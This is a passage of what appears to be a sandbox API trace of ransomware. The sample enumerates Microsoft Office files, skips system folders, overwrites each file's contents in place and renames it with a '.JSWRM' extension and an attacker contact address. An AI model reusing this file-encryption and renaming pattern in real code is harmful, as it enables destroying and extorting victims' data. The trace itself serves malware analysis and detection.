returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="..") returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="...") returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="windows") returned -1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="recovery") returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="perflogs") returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="documents and settings") returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="system volume information") returned -1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2="msocache") returned 1 [0130.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESPS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESPS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresps.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.157] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.157] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.157] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.159] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.159] CloseHandle (hObject=0x314) returned 1 [0130.159] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresps.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESPS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresps.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.160] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDRESTL.ICO", cAlternateFileName="")) returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2=".") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="..") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="...") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="windows") returned -1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="recovery") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="perflogs") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="documents and settings") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="system volume information") returned -1 [0130.160] lstrcmpiW (lpString1="SCDRESTL.ICO", lpString2="msocache") returned 1 [0130.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESTL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESTL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrestl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.214] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.214] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.215] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.216] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.216] CloseHandle (hObject=0x314) returned 1 [0130.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrestl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESTL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrestl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.218] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDRESTS.ICO", cAlternateFileName="")) returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2=".") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="..") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="...") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="windows") returned -1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="recovery") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="perflogs") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="documents and settings") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="system volume information") returned -1 [0130.218] lstrcmpiW (lpString1="SCDRESTS.ICO", lpString2="msocache") returned 1 [0130.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESTS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESTS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESTS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrests.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.220] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.220] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.220] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.221] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.221] CloseHandle (hObject=0x314) returned 1 [0130.222] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrests.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESTS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrests.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.223] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x335, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCHDCNCL.CFG", cAlternateFileName="")) returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2=".") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="..") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="...") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="windows") returned -1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="recovery") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="perflogs") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="documents and settings") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="system volume information") returned -1 [0130.223] lstrcmpiW (lpString1="SCHDCNCL.CFG", lpString2="msocache") returned 1 [0130.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDCNCL.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDCNCL.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDCNCL.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDCNCL.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDCNCL.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDCNCL.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdcncl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.224] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=821) returned 1 [0130.224] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.225] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x330, lpOverlapped=0x0) returned 1 [0130.226] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.226] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x330, lpOverlapped=0x0) returned 1 [0130.226] CloseHandle (hObject=0x314) returned 1 [0130.226] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdcncl.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDCNCL.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdcncl.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.227] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4af, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCHDREQ.CFG", cAlternateFileName="")) returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2=".") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="..") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="...") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="windows") returned -1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="recovery") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="perflogs") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="documents and settings") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="system volume information") returned -1 [0130.227] lstrcmpiW (lpString1="SCHDREQ.CFG", lpString2="msocache") returned 1 [0130.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREQ.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREQ.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDREQ.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREQ.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDREQ.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDREQ.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdreq.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.229] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1199) returned 1 [0130.229] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.229] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x4a0, lpOverlapped=0x0) returned 1 [0130.231] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.231] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x4a0, lpOverlapped=0x0) returned 1 [0130.231] CloseHandle (hObject=0x314) returned 1 [0130.231] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdreq.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCHDREQ.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\schdreq.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.232] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x343, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCHDRESN.CFG", cAlternateFileName="")) returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2=".") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="..") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="...") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="windows") returned -1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="recovery") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="perflogs") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="documents and settings") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="system volume information") returned -1 [0130.232] lstrcmpiW (lpString1="SCHDRESN.CFG", lpString2="msocache") returned 1 [0130.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESN.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESN.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHDRESN.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHDRESN.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 